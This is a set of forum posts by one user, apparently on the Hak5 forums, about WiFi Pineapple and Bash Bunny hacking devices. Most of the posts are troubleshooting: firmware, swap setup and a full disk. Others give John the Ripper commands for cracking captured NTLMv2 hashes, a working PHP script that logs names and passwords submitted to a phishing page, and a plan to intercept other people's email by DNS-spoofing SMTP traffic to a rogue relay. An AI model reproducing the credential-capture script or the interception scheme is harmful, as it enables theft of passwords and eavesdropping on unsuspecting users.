kaiserninja

  1. I found out that my problem was that I was using the John the Ripper standard version, which can't read the NTLMv2 hash. You must have the John the Ripper Jumbo version. I could not get it to compile on Ubuntu 16 because of libopenssl being broken, but I am a Mac user and found a precompiled version of it here: http://download.openwall.net/pub/projects/john/contrib/macosx/ On a Mac, just download this folder, navigate to the /run directory and run the command. No need to compile anything.

         ./john --format=netntlmv2 "your_hashfile_here.txt"

     and it will brute force it. Cracked my 4 letter hash I pulled from the Bash Bunny in about 10 seconds. You could also point it to a dictionary file by appending that to the end of the command like so:

         ./john --format=netntlmv2 "your_hashfile_here.txt" "your_dictionary_file.txt"

     If someone has an idea on how to install John the Ripper Jumbo on Ubuntu, that might be helpful to some people here who don't have a Mac. Also, I couldn't use hashcat because it uses the GPU and my laptop has an onboard Intel unsupported chip. Hope this helps!
  2. What format are the hashes created in the loot folder? Do I need to convert them to another format for cracking? I lifted my hashes from my Windows machine and am trying to use John the Ripper to crack it and it says no "passwd hashes loaded".
  3. That did the trick. Been working on this one for days trying to figure it out. Thanks
  4. I am trying to redirect to a webpage in the www directory called 4043error.html that just says wireless service unavailable after the error.php is executed. I have this and it executes all the way down to the part in red. I get a blank web page with no redirect. I don't code php so any help would be appreciated. This is my error.php file.

         <?php
         $ref = $_SERVER['HTTP_REFERER'];
         $today = date("F j, Y, g:i a");
         if (isset($_POST['name']) && !empty($_POST['name'])) {
             $nam = stripslashes($_POST['name']);
             $pas = stripslashes($_POST['pass']);
             $nam = htmlspecialchars($nam, ENT_QUOTES);
             $pas = htmlspecialchars($pas, ENT_QUOTES);
             $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
             $filed = @fopen("users.txt", "a+");
             @fwrite($filed, "$content\n");
             @fclose($filed);
             $loc = '4043error.html';
             header("Location: $loc");
             die(0);
         }
         ?>
  5. Oh yeah, about relaying. You can configure sendmail to send a copy of all emails that it relays to an email account you create, such as logmail or whatever you want to name it. It takes some configuring in the mc.conf but I think I can make this work. I get my new MK4 today so I will work on this over the weekend. I have a MK4 on which the wireless signal worked only about 5 feet, and it was past the warranty time to send back. Snubs offered to take it back anyway, but after I saw the new elite pack I just ordered a new one and will try to crack open the other and reseat the antenna myself. The Hak5 team is awesome. I will keep you posted on what I come up with.
  6. Smtps on port 553 is encrypted but standard port 25 smtp is not. There are a lot of people who have multiple smtp servers in their settings and if their mail client is unable to connect to their main smtp server they get a choice to use one of the other servers. If they select a standard smtp on port 25 then the redirect would work and the traffic would not be encrypted.
  7. Could you install a mail server such as sendmail and then use dns spoof to forward all smtp requests to your outgoing email open relay mail server? Most smtp servers require you to be assigned an ip address on the corresponding network (i.e. smtp.comcast.net for outgoing email requires you to be using Comcast internet service). Could you spoof all requests for smtp with something like smtp.*.* in dns spoof and forward those requests to your open relay configured smtp server? This would enable you to capture all emails that were being sent from anyone using smtp and not just dedicated network requests. I know that Apple's outgoing smtp server is smtp.mail.me.com so this should effectively capture non dedicated network smtp traffic as well. Does this sound possible? Any thoughts?
  8. So I flashed it by copying the files to the /tmp/upgrade.bin and ran the update command from there. I am back and working!!! Woo hoo! This time I will follow the usb swap directions from here: http://forums.hak5.org/index.php?showtopic=25882 The one thing that would have saved me some time is that the usb drive HAS TO BE FORMATTED TO EXT4 for the pineapple to recognize it. Make sure you do that before you try to set it up as a swap drive. Hope this helps
  9. The problem is not copying files to the www directory. I removed the 3 files that I copied and other than that it is exactly like when I set it up. I was running the fstab changes in the usb webpage of the pineapple and I issued the command

         root@Pineapple:~# mkswap /dev/sda1

     instead of

         root@Pineapple:~# mkswap /dev/sda2

     Now my /dev/root directory is showing 100% full. I even went to the log files and deleted the karma log file and the device still shows as full! Will flashing the pineapple take it back to factory settings and clear out the damage, or is there something easier I can do? Again, I am a noob at this so if you need more info just tell me what to do. Thanks
  10. I just got my MKIV today and am a total noob. I copied the rick roll over to the www directory and everything worked fine with dns spoof. I was then trying to get my SanDisk usb drive to work and am not sure what I did. When I run the df command I get this:

          root@Pineapple:/# df
          Filesystem           1K-blocks      Used Available Use% Mounted on
          rootfs                    1088      1020        68  94% /
          /dev/root                 5120      5120         0 100% /rom
          tmpfs                    14768       520     14248   4% /tmp
          tmpfs                      512         0       512   0% /dev
          /dev/mtdblock3            1088      1020        68  94% /overlay
          overlayfs:/overlay        1088      1020        68  94% /
          /dev/mtdblock7            5120      5120         0 100% /mnt/mtdblock7
          /dev/sda1              3842376     76696   3570492   2% /usb
          root@Pineapple:/#

      Obviously my /dev/root is full and I can't even move files or run the cleanup script. Any help on finding out what is filling up the drive would be great.